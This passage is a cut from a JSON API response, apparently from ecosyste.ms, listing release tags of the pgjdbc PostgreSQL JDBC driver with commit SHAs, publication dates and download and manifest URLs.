38ab8e3d6c309c0c","kind":"commit","published_at":"2026-02-11T18:55:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.10/manifests"},{"name":"REL42.7.9","sha":"79b784e3a63def9d12088471334399a53016d880","kind":"commit","published_at":"2026-01-15T18:02:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.9/manifests"},{"name":"REL42.7.8","sha":"9a5492d99ce43507e318ce4bb56030f74b773d48","kind":"commit","published_at":"2025-09-18T21:10:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.8/manifests"},{"name":"REL42.7.7","sha":"9217ed16cb2918ab1b6b9258ae97e6ede244d8a0","kind":"tag","published_at":"2025-06-11T10:13:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7/manifests"},{"name":"REL42.7.7-rc1","sha":"9217ed16cb2918ab1b6b9258ae97e6ede244d8a0","kind":"tag","published_at":"2025-06-11T09:56:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.7-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7-rc1/manifests"},{"name":"REL42.7.6","sha":"689708f96d446993cd264cbf5bd5696a726cf8b7","kind":"tag","published_at":"2025-05-28T10:24:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6/manifests"},{"name":"REL42.7.6-rc1","sha":"689708f96d446993cd264cbf5bd5696a726cf8b7","kind":"tag","published_at":"2025-05-28T10:13:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6-rc1/manifests"},{"name":"REL42.7.5","sha":"94a1693a61d612dcdbb9c4d01c1e217326a0c044","kind":"tag","published_at":"2025-01-14T15:02:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5/manifests"},{"name":"REL42.7.5-rc1","sha":"94a1693a61d612dcdbb9c4d01c1e217326a0c044","kind":"tag","published_at":"2025-01-14T14:58:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5-rc1/manifests"},{"name":"REL42.7.4","sha":"a23fa7077f220180e2db365abf3144f84b6033fb","kind":"tag","published_at":"2024-08-22T16:44:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4/manifests"},{"name":"REL42.7.4-rc1","sha":"a23fa7077f220180e2db365abf3144f84b6033fb","kind":"tag","published_at":"2024-08-22T14:09:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4-rc1/manifests"},{"name":"REL42.2.30-rc1","sha":"c6bbbc2ccc44cf099bf6b5973896a97636c5e32b","kind":"tag","published_at":"2024-04-09T12:32:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.30-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.30-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.30-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.30-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.30-rc1/manifests"},{"name":"REL42.7.3","sha":"818953a2b30480ecc874f812e46fcb82d1a395fd","kind":"tag","published_at":"2024-03-14T18:45:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3/manifests"},{"name":"REL42.7.3-rc1","sha":"818953a2b30480ecc874f812e46fcb82d1a395fd","kind":"tag","published_at":"2024-03-14T18:42:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3-rc1/manifests"},{"name":"REL42.6.2","sha":"6fa2ca102b842cebad9b45db7c147e6d41d3b93d","kind":"tag","published_at":"2024-03-13T18:57:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2/manifests"},{"name":"REL42.6.2-rc2","sha":"6fa2ca102b842cebad9b45db7c147e6d41d3b93d","kind":"tag","published_at":"2024-03-13T18:57:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2-rc2/manifests"},{"name":"REL42.5.6","sha":"b9953dc45e1607ec1db292f59768f857b75386ef","kind":"tag","published_at":"2024-03-13T18:48:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6/manifests"},{"name":"REL42.5.6-rc1","sha":"b9953dc45e1607ec1db292f59768f857b75386ef","kind":"tag","published_at":"2024-03-13T18:46:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6-rc1/manifests"},{"name":"REL42.4.5","sha":"a4a957ac0e9ee93cdae2fd51f782cda3b7be711b","kind":"tag","published_at":"2024-03-13T18:39:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5/manifests"},{"name":"REL42.3.10","sha":"b0326938dd31d995aedaaca830d974ec05881d75","kind":"tag","published_at":"2024-03-13T18:33:19.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10/manifests"},{"name":"REL42.3.10-rc1","sha":"b0326938dd31d995aedaaca830d974ec05881d75","kind":"tag","published_at":"2024-03-13T18:30:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.10-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.10-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.10-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10-rc1/manifests"},{"name":"REL42.2.29","sha":"d8fadb386f95cd6ab08f9c59fde3ca4b8af04eac","kind":"tag","published_at":"2024-03-13T18:27:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.29","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29/manifests"},{"name":"REL42.2.29-rc1","sha":"d8fadb386f95cd6ab08f9c59fde3ca4b8af04eac","kind":"tag","published_at":"2024-03-13T18:21:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.29-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.29-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.29-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29-rc1/manifests"},{"name":"REL42.4.5-rc1","sha":"a4a957ac0e9ee93cdae2fd51f782cda3b7be711b","kind":"tag","published_at":"2024-03-08T14:02:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5-rc1/manifests"},{"name":"REL42.2.28","sha":"990d63f6be401ab40de5eb303a75924c9e71903c","kind":"tag","published_at":"2024-02-21T00:47:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.28","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28/manifests"},{"name":"REL42.2.28-rc1","sha":"990d63f6be401ab40de5eb303a75924c9e71903c","kind":"tag","published_at":"2024-02-21T00:45:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.28-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.28-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.28-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28-rc1/manifests"},{"name":"REL42.3.9","sha":"d93c74127f5aebda2baa8fcefed4f0b4dfe81d95","kind":"tag","published_at":"2024-02-21T00:42:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9/manifests"},{"name":"REL42.3.9-rc1","sha":"d93c74127f5aebda2baa8fcefed4f0b4dfe81d95","kind":"tag","published_at":"2024-02-21T00:42:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.9-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.9-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.9-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9-rc1/manifests"},{"name":"REL42.4.4","sha":"fe002b31f2c7dcf7e2fe75fe7fd18df4e4503abf","kind":"tag","published_at":"2024-02-21T00:37:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4/manifests"},{"name":"REL42.4.4-rc1","sha":"fe002b31f2c7dcf7e2fe75fe7fd18df4e4503abf","kind":"tag","published_at":"2024-02-21T00:37:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4-rc1/manifests"},{"name":"REL42.5.5","sha":"475e3e2af3033c666fc1c0015159b35455118ae5","kind":"tag","published_at":"2024-02-21T00:25:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5/manifests"},{"name":"REL42.5.5-rc1","sha":"475e3e2af3033c666fc1c0015159b35455118ae5","kind":"tag","published_at":"2024-02-21T00:24:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5-rc1/manifests"},{"name":"REL42.6.1","sha":"d368b1cc5fbfc9750151f87d78e12db97e13af0e","kind":"tag","published_at":"2024-02-21T00:16:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1/manifests"},{"name":"REL42.6.1-rc1","sha":"d368b1cc5fbfc9750151f87d78e12db97e13af0e","kind":"tag","published_at":"2024-02-21T00:15:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1-rc1/manifests"},{"name":"REL42.7.2-rc5","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T23:53:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc5/manifests"},{"name":"REL42.7.2-rc4","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T16:35:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc4/manifests"},{"name":"REL42.7.2-rc3","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:49:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc3/manifests"},{"name":"REL42.7.2-rc2","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:25:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc2/manifests"},{"name":"REL42.7.2-rc1","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:10:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc1/manifests"},{"name":"REL42.7.2","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"commit","published_at":"2024-02-20T15:01:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2/manifests"},{"name":"REL42.7.1","sha":"27bbccfeb73eec105057e53ae6068faf0e6f40b2","kind":"tag","published_at":"2023-12-06T15:32:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1/manifests"},{"name":"REL42.7.1-rc2","sha":"27bbccfeb73eec105057e53ae6068faf0e6f40b2","kind":"tag","published_at":"2023-12-06T15:26:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1-rc2","dependencies_